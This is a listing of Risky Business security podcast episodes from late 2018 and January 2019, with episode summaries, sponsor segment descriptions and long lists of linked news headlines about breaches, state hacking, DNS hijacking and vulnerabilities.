Show notes US hammers Huawei with 23 indictments for stolen trade secrets, fraud - CNET Major iPhone FaceTime bug lets you hear the audio of the person you are calling ... before they pick up - 9to5Mac Abusing Exchange: One API call away from Domain Admin - DHS: Multiple US gov domains hit in serious DNS hijacking wave | Ars Technica - Emergency Directive 19-01 Rep. Langevin: We need a DHS briefing to understand extent of DNS hijacking threat ALERT: DNS hijacking activity - NCSC Site APNewsBreak: Undercover agents target cybersecurity watchdog Japanese government plans to hack into citizens' IoT devices | ZDNet Internet experiment goes wrong, takes down a bunch of Linux routers | ZDNet Lessons for Corporate Boardrooms From Yahoo’s Cybersecurity Settlement - The New York Times Mystery still surrounds hack of PHP PEAR website | ZDNet WordPress sites under attack via zero-day in abandoned plugin | ZDNet OONI report into Internet filtering in Venezuela Tonga sent back to 'dark ages' after underwater Internet cable severed | Fox News Opinion | Mueller’s Real Target in the Roger Stone Indictment - The New York Times Exclusive: Ukraine says it sees surge in cyber attacks targeting election | Reuters This Time It’s Russia’s Emails Getting Leaked Russia Targeting British Institute In Disinformation Campaign Unsecured MongoDB databases expose Kremlin's backdoor into Russian businesses | ZDNet Facebook to encrypt Instagram messages ahead of integration with WhatsApp, Facebook Messenger | TechCrunch Cryptopia funds still being drained by hackers while police investigated | RNZ News Europol arrests UK man for stealing €10 million worth of IOTA cryptocurrency | ZDNet Police license plate readers are still exposed on the internet | TechCrunch Malvertising campaign targets Apple users with malicious code hidden in images | ZDNet Hackers are going after Cisco RV320/RV325 routers using a new exploit | ZDNet Spencer Dailey on Twitter: "hard to understate how bad this flaw is--shocked more pubs haven't picked up on this. The affected chip is ubiquitous, the potential exploits allow anyone within wifi-range to run arbitrary code on the machine. Wifi routers themselves use affected chip 🤯" GitHub - hannob/apache-uaf: Apache use after free bug infos / ASAN stack traces Lesley Carhart on Twitter: "At the very least I’ll be able to publish these questions so that other people can grill their properties should they forcibly migrate to IoT equipment." APT39: An Iranian Cyber Espionage Group Focused on Personal Information « APT39: An Iranian Cyber Espionage Group Focused on Personal Information | FireEye Inc 44CON 2013 - A talk about (info-sec) talks - Haroon Meer - YouTube

Risky Business #527 -- Featuring Alex Stamos, The Grugq, Susan Hennessey, Brian Krebs, Kelly Shortridge and Bobby Chesney

Jan 22, 2019


Alex Stamos co-hosts this week’s episode. Topics discussed include:

DNC says Russia tried to own its servers in November 2018 South Korean Defence Ministry owned Lazarus Group busy in Chile West African banks suffer multiple intrusions Michael Cohen admits rigging online poll for Trump Nine charged over SEC hack More USG SSL certificates due to expire apt-get remote root RCE Don’t use your Garmin to scope your murder escape route Big plot twist in viral video outrage

This week’s show is brought to you by Duo Security, which I guess is now Cisco Duo Security. Wendy Nather - Duo’s head of advisory CISOs - will be along in this week’s sponsor interview to talk about a topic near and dear to my heart: victim shaming. That’s a good one so please do stick around for that.

Links to everything that we discussed are below and you can follow Patrick or Alex on Twitter if that’s your thing.

Show notes DNC says Russia tried to hack its servers again in November 2018 | ZDNet Hackers breach and steal data from South Korea's Defense Ministry | ZDNet North Korean hackers infiltrate Chile's ATM network after Skype job interview | ZDNet West African banks hit by multiple hacking waves last year | ZDNet Michael Cohen says Trump directed him to pay for poll rigging - CNNPolitics Nine defendants charged in SEC hacking scheme that netted $4.1 million | Ars Technica 773M Password ‘Megabreach’ is Years Old — Krebs on Security Advertising network compromised to deliver credit card stealing code | ZDNet Major Security Breach Discovered Affecting Nearly Half of All Airline Travelers Worldwide | Safety Detective These are all the federal HTTPS websites that’ll expire soon because of the US government shutdown | TechCrunch The Hacker News on Twitter: "We all love your media player, but that’s really rude #VLC 🙄 VLC developers refused to consider #software "update-over-HTTP" as a threat. Responded→ “no threat model. no proof. no #security bug" It wouldn't hurt if you simply consider the suggestion.…" Remote Code Execution in apt/apt-get Hitman Runner Mark Fellows Convicted of Mob Murder on GPS Watch Data HN Front Page on Twitter: "FBI arrests PureVPN user with log data that was said to not exist L: C:" Lin Affidavit Huawei founder says company would not share user secrets | The Sacramento Bee Opinion | If 5G Is So Important, Why Isn’t It Secure? - The New York Times Facebook’s Sputnik Takedown — In Depth – DFRLab – Medium Covington students, Nathan Phillips viral video: Twitter suspends account that helped ignite controversy - CNN Russia tries to force Facebook and Twitter to relocate servers to Russia | Ars Technica Forget Bitcoin: Why Criminals are Using Fortnite to Launder Illicit Funds Fortnite security issue would have granted hackers access to accounts | ZDNet VC funding of cybersecurity companies hits record $5.3B in 2018 | TechCrunch

Risky Business #526 -- Huawei arrest in Poland, DPRK SWIFT hack conviction, more from the El Chapo trial

Jan 15, 2019


This week’s podcast features Patrick and Adam talking about the week’s security news, including:

Huawei staffer arrested for spying in Poland Conviction in DPRK SWIFT hack against Bangladesh central bank El Chapo used Flexispy to spy on mistresses and staff NSO group on charm offensive Iran hijacking DNS entries, conducting PITM with DV certs Kaspersky tipped NSA on Hal Martin US government certificates expire amid shutdown Idiot sentenced to 10 years prison for DDoSing children’s hospital

This week’s show is brought to you by Trail of Bits! Trail of Bits is a security engineering firm and consultancy based in New York. They aren’t a typical pen-testing firm, they build as well as break.

In this week’s sponsor interview JP Smith from Trail of Bits joins us to talk about the work he put in to CSAW. Not the Centre for Sustainable Architecture with Wood, which is a thing, but the Cyber Security Awareness Worldwide CTF.

JP is a sick man. He’s sick. You’ll hear about the mind-bending CTF challenges he put together for CSAW. Remarkably, some teams were actually able to solve his problems, some of which featured complex numbers mapped to a four dimensional unit sphere being used to drive the rotation of a virtual IBM Selectric typewriter golfball in Second Life. As I say, he’s a sick, sick man.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Poland spy arrest: China telecoms firm Huawei sacks employee - BBC News Ex-RCBC manager guilty in $81-M heist | The Manila Times Online Alan Feuer on Twitter: "Chapo would play a little game. He would call people who had the “special” phones and chat with them a while then hang up, secretly activate the mic and listen to what they said about him." Chapo’s I.T. Guy: Working for a Kingpin Can Cause a Nervous Breakdown - The New York Times Exclusive: How Mexican drug baron El Chapo was brought down by technology made in Israel A Worldwide Hacking Spree Uses DNS Trickery to Nab Data | WIRED Global DNS Hijacking Campaign: DNS Record Manipulation at Scale « Global DNS Hijacking Campaign: DNS Record Manipulation at Scale | FireEye Inc Exclusive: How a Russian firm helped catch an alleged NSA data thief - POLITICO .gov security falters during U.S. shutdown | Netcraft Senators Call on FCC To Investigate T-Mobile, AT&T, and Sprint Selling Location Data to Bounty Hunters - Motherboard Google Demanded That T-Mobile, Sprint Not Sell Google Fi Customers' Location Data - Motherboard AT&T to Stop Selling Location Data to Third Parties After Motherboard Investigation - Motherboard Feds Can't Force You To Unlock Your iPhone With Finger Or Face, Judge Rules Ryuk ransomware gang probably Russian, not North Korean | ZDNet Man gets 10 years for cyberattack on Boston Children's Hospital | Hacker 'BestBuy' sentenced to prison for operating Mirai DDoS botnet | ZDNet Police get report of a shooting only to find out it was a prank - Palo Alto Daily Post Scooter startup Bird tried to silence a journalist. It did not go well. | TechCrunch Yet another Qld cop charged with hacking - Security - iTnews Some of the biggest web hosting sites were vulnerable to simple account takeover hacks | TechCrunch $900,000 On Offer For Anyone Who Can Hack A Tesla Model 3 SCP implementations impacted by 36-years-old security flaws | ZDNet Google Chrome's built-in ad blocker to roll out worldwide on July 9 | ZDNet Gaining access to Uber's user data through AMPScript evaluation – Assetnote Rahul Sridhar on Twitter: "Here's a short story about cryptography in 2018 in five tweets:"

Risky Business #525 -- Back on deck for 2019!

Jan 9, 2019


In this week’s show Adam Boileau and Patrick Gray discuss the security news of the last few weeks, including:

German politicians pwnt, suspect arrested Possible ransomware attack affects US newspapers Mass 2FA bypasses impacting Gmail users in Middle East Emergency warning system in Australia popped Ethereum Classic double-spend attack a sign of things to come EU to fund open source bug bounties Attackers steal details of 1,000 North Korean defectors Doing the Bloomberg hack for real at 35C3 El Chapo should have used Signal Much, much more…

This week’s show is brought to you by Cylance! BlackBerry announced that it’s acquiring Cylance for $1.4bn (I don’t know if that’s closed yet) which is great news for all the founders and early employees there – some of whom I know reasonably well. So congrats to team Cylance on that!

But we’re not talking about that this week. Instead, Cylance’s very own Scott Scheferman joins us to talk about the MITRE ATT&CK framework and how it’s informing their product dev. There’s some product talk in that interview but there’s also some real meat there so I let it run long. Scott says we’re close to the terrible situation where security companies are going to start using MITRE ATT&CK as a marketing tool, like “Full MITRE ATT&CK coverage!”

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Arrested German hacker confesses to leaking politicians' information, report says Before Germany’s Massive Hack, We Learned What Not to Do With Sensitive Stolen Information - Motherboard What we still don’t know about the cyberattack on Tribune newspapers - The Washington Post Ransomware suspected in cyberattack that crippled major US newspapers | ZDNet How Hackers Bypass Gmail 2FA at Scale - Motherboard Hackers target 'hundreds' of Middle East activists with fake login pages, 2FA bypass schemes Hackers send fake emergency emails, texts, messages using warning system Coinbase suspends Ethereum Classic (ETC) trading after double-spend attacks | ZDNet I Gave a Bounty Hunter $300. Then He Located Our Phone - Motherboard EU to fund bug bounty programs for 14 open source projects starting January 2019 | ZDNet Hackers hijack thousands of Chromecasts to warn of latest security bug | TechCrunch Hackers steal personal info of 1,000 North Korean defectors | ZDNet Modchips - Trammell Hudson's Projects Hacking Group Decrypts Cache of Insurance Files Related to 9/11 Attacks - Motherboard Hackers Make a Fake Hand to Beat Vein Authentication - Motherboard You Can Now Get $1 Million for Hacking WhatsApp and iMessage - Motherboard Alan Feuer on Twitter: "In February 2010, an undercover FBI agent met with the target of a sensitive investigation: Christian Rodriguez, an IT specialist who had recently developed a remarkable product: an encrypted communication network for the Mexican drug lord El Chapo and his Colombian partners." Encrypted Messaging App Signal Says It Won’t Comply With Australia’s New Backdoor Bill - Motherboard Louis Theroux among those hit by Twitter hack exposing security flaw | Technology | The Guardian NSA to release a free reverse engineering tool | ZDNet Open-source tool aims to curb BGP hijacking amid Chinese espionage concerns ARTEMIS — neutralizing BGP hijacking within a minute | APNIC Blog New hardware-agnostic side-channel attack works against Windows and Linux | ZDNet 1901.01161.pdf Презентация PowerPoint CVE-2019-0547 | Windows DHCP Client Remote Code Execution Vulnerability

Risky Biz Soap Box: From 2 billion events to 350 alerts with Respond Software

Dec 14, 2018


Soap Box is the podcast series we do here at Risky.Biz where we have detailed discussions with vendors about all sorts of stuff – sometimes it’s about their products, other times it’s about the landscape as they see it, other times it’s about research they’ve done that they want to promote. Soap Box is a wholly sponsored podcast series – just so you know – so everyone you hear on it, paid to be on it.

And this Soap Box edition is brought to you by Respond Software. We’ll be joined by Respond Software’s co-founder and CEO, Mike Armistead to talk about Respond’s tech. Mike has an interesting history in infosec… he actually co-founded Fortify, the software security firm, before winding up at HPE as the VP and General Manager for Arcsight, the poor fella. But he’s free now! Freeeeeee! And he’s co-founded the venture we’re talking about today.

So, what’s the idea behind Respond Software? Well, to break it down into really simple terms the whole idea is to take all the zillions of events your existing security kit flags and distill them down into meaningful alerts. To put this into context, Mike says that during the 30 days in the lead up to the interview we recorded, his customers fed two billion events into their Respond Software gear. Of those two billion events, Respond deemed 7 million of them worthy of escalation, and from there determined 45,000 were malicious, but then… and this is the cool part, this only resulted in 350 incidents raised by the Respond platform. From 2 billion to 350.

So it’s a great idea – tune out the crap and look at meaningful correlations. Automate the decision making around what’s serious and what’s not. You’ve got all this gear, maybe you’ve got something aggregating it, but what’s applying decision logic to it?

Mike sent me a list of software Respond currently supports: all manner of IDSes, AV and EDR suites and then other stuff that gives their software the context it needs to make better decisions, like active directory, Nessus, Qualys, Splunk, QRadar… whatever! The idea is, plug ALL your over-alerting crap into Respond Software’s gear and it’ll do a good enough job of correlating events that you’ll only have to deal with what’s real. Well, that’s the pitch. Mike Armistead joined me to to flesh it out a bit more.

Show notes Emulating the decision-making of an expert security analyst | Respond Software

Risky Business #524 -- Huawei CFO arrested, US Government dumps on Equifax

Dec 12, 2018


This is the last weekly Risky Business podcast for 2018. We’ll be posting a Soap Box edition early next week then going on break until January 9.

In this week’s show Adam Boileau and Patrick Gray discuss the week’s security news:

Huawei’s CFO arrested over sanctions violations BT in the UK removes Huawei equipment from 4G network Australia passes controversial surveillance law US House Oversight Committee blasts Equifax in scathing report Bloomberg plays word-games on Super Micro story MOAR

This week’s show is sponsored by Bugcrowd. In this week’s sponsor interview Bugcrowd’s CTO and founder Casey Ellis tells us why his company is launching “pay for effort” products to run alongside bounty programs.

Links to everything that we discussed are below and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes US, China executives grow wary about travel after Huawei arrest Canadian court grants bail to CFO of China's Huawei | Reuters Michael Kovrig: Canadian ex-diplomat 'held in China' - BBC News BT removing Huawei equipment from parts of 4G network | Technology | The Guardian China's cyber-espionage against U.S. is 'more audacious,' NSA official says amid Huawei flap China spied on African Union headquarters for five years — Quartz Africa House panel: Equifax breach was ‘entirely preventable’ Committee Releases Report Revealing New Information on Equifax Data Breach - United States House Committee on Oversight and Government Reform Experian Exposes Apparent Customer Data in Training Manuals - Motherboard NotPetya leads to unprecedented insurance coverage dispute Over 40,000 credentials for government portals found online | ZDNet What's actually in Australia's encryption laws? Everything you need to know | ZDNet Australia's encryption laws will fall foul of differing definitions | ZDNet Australia Just Became The Testing Ground For Breaking Into Encryption Matthew Green on Twitter: "GCHQ has proposal to surveill encrypted messaging and phone calls. The idea is to use weaknesses in the “identity system” to create a surveillance backdoor. This is a bad idea for so many reasons. Thread. 1/" Melbourne terror attack plot suspects arrested in police raids over mass shooting fears - ABC News (Australian Broadcasting Corporation) Why Scott Morrison is right on encryption but wrong on Muslims Super Micro Says Third-Party Test Found No Malicious Hardware - Bloomberg Someone Defaced Website With ‘Goatse’ And Anti-Diversity Tirade - Motherboard Nearly 250 Pages of Devastating Internal Facebook Documents Posted Online By UK Parliament - Motherboard Internal Documents Show Facebook Has Never Deserved Our Trust or Our Data - Motherboard Google+ Exposed Data of 52.5 Million Users and Will Shut Down in April | WIRED Iranians indicted in Atlanta city government ransomware attack | Ars Technica Report: FBI opens criminal investigation into net neutrality comment fraud | Ars Technica Police arrest hacker behind WeChat ransomware attack - CGTN A bug in Microsoft’s login system made it easy to hijack anyone’s Office account | TechCrunch For the fourth month in a row, Microsoft patches Windows zero-day used in the wild | ZDNet Hackers ramp up attacks on mining rigs before Ethereum price crashes into the gutter | ZDNet OpSec mistake brings down network of Dark Web money counterfeiter | ZDNet Google CEO Says No Plan to ‘Launch’ Censored Search Engine in China - Motherboard Marriott to reimburse some guests for new passports after massive data breach | ZDNet Eastern European banks lose tens of millions of dollars in Hollywood-style hacks | ZDNet Industrial espionage fears arise over Chrome extension caught stealing browsing history | ZDNet Hacker Fantastic on Twitter: ""open-source is more secure than closed-source because you can view the source code" ... GNU inetutils <= 1.9.4 telnet.c multiple overflows" Your Apps Know Where You Were Last Night, and They’re Not Keeping It Secret - The New York Times APPSEC CALIFORNIA 2019 - OWASP AppSec California 2019 Next Gen Pen Testing

Snake Oilers 8 part 2: Forticode's Cipherise, device features from Exabeam and SentinelOne on "active EDR"

Dec 10, 2018


Snake Oilers is the podcast where we get a bunch of vendors together to pitch their stuff – they all pay to participate, just so you know – and today we’re going to hear three pitches from tech companies: one from Forticode, one from Exabeam and one from SentinelOne.

That’s right, we talk to vendors to get their best pitches so you don’t have to!

Forticode joins us to pitch its Cipherise platform – applied PKI wrapped into a slick mobile platform that helps large organisations authenticate their users, and helps their users authenticate them.

Exabeam will be talking about how they’re doing more device analytics in their SIEM platform and SentinelOne will be talking about how they differentiate themselves in the highly competitive EDR space.

Links to all of these companies are below.

Show notes Forticode Introducing Behavioral Analysis for Devices - Exabeam Entity Analytics - Exabeam Why SentinelOne

Risky Business #523 -- So many breaches

Dec 5, 2018


This week’s show features Patrick Gray and Adam Boileau discussing the week’s security news, including:

The Marriott, Quora, Dell and Sky Brazil data breaches Kashoggi associate to sue NSO Group Australia’s AA Bill set to pass NZ give Huawei the boot AutoCAD malware targets key verticals Republicans’ 2018 campaign hacked Czech government blames Russia for intrusions into key systems Horror-show bug in Kubernetes

This week’s show is brought to you by Duo Security, big thanks to Duo for that! In this week’s sponsor interview we’ll be chatting with Duo Security’s very own Dave Lewis about some Beyond Corp stuff. Beyond Corp is the enterprise computing model of the future and Dave will be along after this week’s news to talk about some of its finer points.

Links to everything that we discussed are below. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Marriott: Data on 500 Million Guests Stolen in 4-Year Breach — Krebs on Security Marriott sued hours after announcing data breach | ZDNet Quora Announces Data Breach of 100 Million Users - Motherboard Dell announces security breach | ZDNet Sky Brasil exposes data of 32 million subscribers | ZDNet Israeli Software Helped Saudis Spy on Khashoggi, Lawsuit Says - The New York Times Police, spies gain powers to access encrypted messages after political deal struck GCHQ’s not-so-smart idea to spy on encrypted messaging apps is branded ‘absolute madness’ | TechCrunch Principles for a More Informed Exceptional Access Debate - Lawfare Defence department exposed by Chinese hackers 'Watering hole' attacks: How China's hackers went after think tanks and universities Huawei banned from New Zealand's 5G mobile network over security concerns - ABC News (Australian Broadcasting Corporation) 20180717_HCSEC_Oversight_Board_Report_2018_-_FINAL.pdf UK and Germany grow wary of Huawei as US turns up pressure | Financial Times New industrial espionage campaign leverages AutoCAD-based malware | ZDNet House Republican campaign arm hacked during 2018 election Czech Republic blames Russia for multiple government network hacks | ZDNet Magecart Group Ups Ante: Now Goes After Admin Credentials | Threatpost | The first stop for security news FBI dismantles gigantic ad fraud scheme operating across over one million IPs | ZDNet After Microsoft complaints, Indian police arrest tech support scammers at 26 call centers | ZDNet "WeChat Payment" ransomware makers are locked in transmission, harm and epidemic ultimate decryption ​Kubernetes' first major security hole discovered | ZDNet Researchers discover SplitSpectre, a new Spectre-like CPU attack | ZDNet Hackers are opening SMB ports on routers so they can infect PCs with NSA malware | ZDNet Microsoft warns about two apps that installed root certificates then leaked the private keys | ZDNet Project Zero: Adventures in Video Conferencing Part 1: The Wild World of WebRTC Cyber attack victims face disputes with insurers | Financial Times unprivileged users with UID > INT_MAX can successfully execute any systemctl command (#74) · Issues · polkit / polkit · GitLab

Snake Oilers 8 part 1: Rapid7's InsightAppSec, Whitesource and Virus Total Enterprise

Dec 3, 2018


This is the first part of our final Snake Oilers edition for 2018.

Snake OIlers, for people don’t know it, is the podcast where vendors pay to come on to the show to promote their wares. This series actually turned out to be way more popular than we expected. People quite like listening to security companies actually explaining what they do in clear terms.

We have six vendors participating in this last round of Snake Oilers for the year – we’ve split the podcast into two podcasts containing three vendor pitches each, and in this part you’ll be hearing pitches from Rapid7, WhiteSource and Chronicle.

Dan Kuykendall of Rapid7 talks InsightAppSec, its DAST solution. David Habusha of Whitesource talks software composition analysis Brandon Levene of Chronicle on VirusTotal Enterprise

Part two is up next week!

Show notes InsightAppSec | Rapid7 Open Source Security and License Management | WhiteSource Introducing VirusTotal Enterprise – Chronicle Blog – Medium

Risky Business #522 -- Alex Stamos co-hosts the show, reflects on Snowden disclosures

Nov 28, 2018


We’ve got a slightly different edition of the show this week – Alex Stamos is filling in for Adam Boileau this week in the news slot.

Most of you know him as Facebook’s recently departed chief security officer. Alex also served as the CSO at Yahoo for a time, but his security career stretches back a long way. He co-founded iSEC Partners back in 2004, and before that he did some time with @Stake.

The @Stake mafia is everywhere.

These days Alex is an adjunct professor at Stanford University. He joined me to talk about the week’s security news, as well as to have a chat about the Edward Snowden disclosures, five years on.

This week’s show is brought to you by Thinkst Canary, big thanks to them for that. And instead of one of their staff being on the show this week in the sponsor chair, they asked me to interview this week’s sponsor guest, their customer, Mike Ruth, a security engineer with Cruise Automation.

Mike did a presentation at a conference called QCon recently all about automating the deployment of canary tokens at scale using some nifty CI/CD tricks. He’ll be joining us after the news to tell us all about that.

Items discussed in this week’s news:

NSO Group busted to selling to Saudi Arabia NSO malware targets Mexican journalists Edward Snowden claims NSO connection in Khashoggi case Australia’s AA Bill latest npm supply-chain attack targets Bitcoiners Guardian reports Manafort met Assange, denials, lawsuits flying already UK parliament seizes Facebook documents Uber fined over 2016 breach coverup UK cops decline to charge bug reporter USPS finally fixes data exposure after Krebs intervention Rowhammer attack bypasses ECC protections Bloomberg is investigating its own reporting on Supermicro Magecart is everywhere Google, Mozilla plan browser access to file systems

Links to everything that we discussed are below and you can follow Patrick or Alex on Twitter if that’s your thing.

Show notes Israeli hacking firm NSO Group offered Saudis cellphone spy tools - report | The Times of Israel Edward Snowden: Israeli spyware was used to track and eventually kill Jamal Khashoggi | Business Insider A Journalist Was Killed in Mexico. Then His Colleagues Were Hacked. - The New York Times Home Affairs attempts to allay concerns about Australian exporters for encryption-busting Bill | ZDNet Widely used open source software contained bitcoin-stealing backdoor | Ars Technica I don't know what to say. · Issue #116 · dominictarr/event-stream · GitHub Manafort held secret talks with Assange in Ecuadorian embassy, sources say | US news | The Guardian UK parliament seizes cache of internal Facebook documents to further privacy probe | TechCrunch Uber fined $1.17 million by U.K., Dutch authorities for 2016 breach UK cops won't go after researcher who reported security issue to York city officials | ZDNet USPS Site Exposed Data on 60 Million Users — Krebs on Security Potentially disastrous Rowhammer bitflips can bypass ECC protections | Ars Technica Bloomberg is still reporting on challenged story regarding China hardware hack - The Washington Post Magecart group hilariously sabotages competitor | ZDNet Amazon admits it exposed customer email addresses, but refuses to give details | TechCrunch Google, Mozilla working on letting web apps edit files despite warning it could be 'abused in terrible ways' - TechRepublic Germany proposes router security guidelines | ZDNet Half of all Phishing Sites Now Have the Padlock — Krebs on Security The Snowden Legacy, part one: What’s changed, really? | Ars Technica QConSF18 - Canaries - Google Drive Canary — know when it matters

Risky Biz Soap Box: MITRE ATT&CK Matrix, misconfigured security controls, attack sim and more!

Nov 25, 2018


The Soap Box podcast series is a wholly sponsored podcast series we do here at Risky.Biz – vendors pay to participate. This Soap Box edition is brought to you by AttackIQ.

AttackIQ is a five-year-old company that makes an attack simulation platform. The idea is you agitate a network with suspicious traffic and activities, then measure what the response looks like on the other side. As you’ll hear, Stephan argues this is a better way to test your controls than trying to do it after an incident has been and gone.

Mostly people are using it to verify the effectiveness of their security controls. They already have endpoint security software, IDS, various monitoring bits and pieces, but quite often this stuff just isn’t tuned right. So, you throw some attack traffic and behaviour at your systems and see what bubbles up

One piece of work that has been absolutely vital to AttackIQ’s success is the MITRE ATT&CK Matrix. Like AttackIQ, the ATT&CK Matrix has been around for five years.

Stephan Chenette is AttackIQ’s CTO and he joined me to talk all about how they’re trying to use the ATT&CK Matrix to drive their whole outlook, and, conversely, how they’re spending time talking to MITRE about where the whole thing is going.

Show notes MITRE ATT&CK™ AttackIQ

Risky Business #521 -- Bears everywhere

Nov 21, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

Cozy Bear is back, Fancy Bear has new tooling Russian government wants DNC lawsuit thrown out Cyber Command submitting samples to VirusTotal Google BGP shenanigans Australian/China Telecom BGP shenanigans All the recent Facebook drama More speculative execution bugs Julian Assange likely to be charged Vault7 leaker facing new charges Phineas Fisher investigation abandoned Bitcoin/Tether link probed by DoJ, btc in free-fall MUCH MOAR

This week’s show is brought to you by Proofpoint.

Sherrod DeGrippo, Proofpoint’s director of threat research and detection is this week’s sponsor guest. Surprisingly, she tells us that ransomware via email is a dead duck.

Links to everything that we discussed are below. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Russia’s Cozy Bear comes out of hiding with post-election spear-phishing blitz | Ars Technica Russia's Fancy Bear and Cozy Bear Hackers May Have New Phishing Tricks | WIRED Russia wants DNC hack lawsuit thrown out, citing international conventions | ZDNet Russian Trolls Sue Facebook, Their Old Propaganda Machine Ukraine detects new Pterodo backdoor malware, warns of Russian cyberattack | Ars Technica US Cyber Command starts uploading foreign APT malware to VirusTotal | ZDNet Google goes down after major BGP mishap routes traffic through China | Ars Technica How China diverts, then spies on Australia's internet traffic Rob Joyce on Twitter: "I hope this latest fiasco of traffic rerouting through China is the wakeup call for all of us to get serious about addressing the massive and unacceptable vulnerability inherent in today’s BGP routing architecture." Everything you need to know about Facebook’s latest crisis - Recode Facebook has been accused of peddling anti-Semitic conspiracy theories - Vox Yes, Facebook made mistakes in 2016. But we weren’t the only ones. - The Washington Post Researchers discover seven new Meltdown and Spectre attacks | ZDNet The US Department of Justice is reportedly preparing to indict WikiLeaks founder Julian Assange | Business Insider Julian Assange has been charged, prosecutors reveal inadvertently in court filing Accused 'Vault 7' leaker to face new charges Hacking Team Hacker Phineas Fisher Has Gotten Away With It - Motherboard Bitcoin Price Manipulated by Tether? Justice Department Probing - Bloomberg A Browser Extension Apparently Stole The Private Facebook Messages Of At Least 81,000 Accounts | Gizmodo Australia The Hack Millions of People Are Installing Themselves - Motherboard Facebook patches another bug that could have allowed mass-harvesting of user data | ZDNet Trump signs bill that creates the Cybersecurity and Infrastructure Security Agency | ZDNet AWS rolls out new security feature to prevent accidental S3 data leaks | ZDNet Most ATMs can be hacked in under 20 minutes | ZDNet Deserialization issues also affect Ruby, not just Java, PHP, and .NET | ZDNet Adobe ColdFusion servers under attack from APT group | ZDNet VirtualBox zero-day published by disgruntled researcher | ZDNet Office 365, Azure users are locked out after a global multi-factor authentication outage | TechCrunch Cisco says a flaw in its Adaptive Security Appliance allows remote attacks He Helped People Cheat at Grand Theft Auto. Then His Home Was Raided. - The New York Times Proofpoint

Risky Business #520 -- Tanya Janca talks security in the curriculum

Oct 31, 2018


We’ve got a great podcast for you this week. Tanya Janca will be talking about some volunteer work she’s been doing with a Canadian government panel on getting security content into children’s school curriculums.

In this week’s sponsor interview we’ll be talking with Ferruh Mavituna of Netsparker.

They launched Netsparker Cloud a while ago so now they have some decent telemetry I wanted to ask Ferruh what he’s found surprising now he’s sitting on a mountain of scan results. The types of bugs being turned up aren’t really a surprise, but the extent to which old software is a problem was actually pretty surprising to him. He knew it was bad, he says, but he didn’t know it’s this bad.

Adam Boileau, as usual, joins the show this week to talk about all the week’s security news:

More Chinese MSS officers indicted by the US DoJ ASD chief speaks publicly on 5G Huawei ban China playing funny buggers with BGP Russia is still messing with the US during the midterms Facebook boots more Iranian influence pages New privacy features in Signal Plus much, much more!

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes Chinese Intelligence Officers and Their Recruited Hackers and Insiders Conspired to Steal Sensitive Commercial Aviation and Technological Data for Years | OPA | Department of Justice U.S. charges Chinese intelligence officers for jet engine data hack Huawei's ban to 5G network 'supported by technical advice', spy agency chief says - ABC News (Australian Broadcasting Corporation) Canadian security boss ain't afraid of no Huawei, sees no reason for ban • The Register US bans exports to Chinese DRAM maker citing national security risk | ZDNet China has been 'hijacking the vital internet backbone of western countries' | ZDNet Russia Is Meddling In The Midterms. The White House Just Isn't Talking About It. The Crisis of Election Security - The New York Times DHS: Election officials inundated, confused by free cyber-security offerings | ZDNet Facebook removes more Iran-linked accounts, this time targeting the US & UK | ZDNet We posed as 100 senators to run ads on Facebook. Facebook approved all of them. – VICE News NYT: Chinese and Russian spies routinely eavesdrop on Trump’s iPhone calls | Ars Technica North Korea blamed for two cryptocurrency scams, five trading platform hacks | ZDNet New Signal privacy feature removes sender ID from metadata | Ars Technica Windows Defender becomes first antivirus to run inside a sandbox | ZDNet Pakistani bank denies losing $6 million in country's 'biggest cyber attack' | ZDNet Many CMS plugins are disabling TLS certificate validation... and that's very bad | ZDNet Twelve malicious Python libraries found and removed from PyPI | ZDNet How ‘Mr. Hashtag’ Helped Saudi Arabia Spy on Dissidents - Motherboard Government Spyware Vendor Left Customer, Victim Data Online for Everyone to See - Motherboard Apple's T2 Security Chip Makes It Harder to Tap MacBook Mics | WIRED Microsoft Windows zero-day disclosed on Twitter, again | ZDNet Digital DASH – ICTC - Focus on Information Technology (FIT)

Risky Biz Soap Box: Duo's Olabode Anise recap's his Black Hat talk on Twitter bots

Oct 26, 2018


Soap Box is the wholly sponsored podcast series we do where vendors pay to participate. They sometimes want to talk about their products, other times they want to talk about general ecosystem stuff, other times they want to talk about research they’ve done.

And that’s what’s happening today! Olabode Anise is a data scientist at Duo Security. He and his colleague Jordan Wright put together a talk for Black Hat this year all about Twitter bots. It was called Don’t @ me, hunting Twitter bots at scale.

As you’ll hear, finding bots on Twitter at scale isn’t that hard, but doing so with 100% confidence isn’t as easy as you’d think.

You can check out a blog post from Olabode in the show note below.

Show notes Olabode's blog post on Twitter bots:

Risky Business #519 -- '90s IRC war between US and Russia intensifies

Oct 24, 2018


This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

CYBERCOM doxing Russian operators. No, really. Arrest over Russian midterm info-op Bloomberg dumpster fire is now a tyre fire Equifax insider sentenced for insider trading Twitter releases bot dataset Saudi insider responsible for 2015 Twitter breach Trisis/Triton now linked to Russia Kaspersky doxes NSA op Risky Business cited by Senate Estimates, AA Bill faces possible delay Much, much more!

This week’s show is sponsored by Cylance, and this week’s sponsor interview is with Josh Lemos.

That’s an interesting chat – Cylance has succeeded in applying machine learning to classifying binaries, but what next? Where does it make sense to apply machine learning next, from their point of view? As you’ll hear, a binary classifier is one thing, but applying ML to something like endpoint detection and response or network traffic is actually a lot more complicated.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

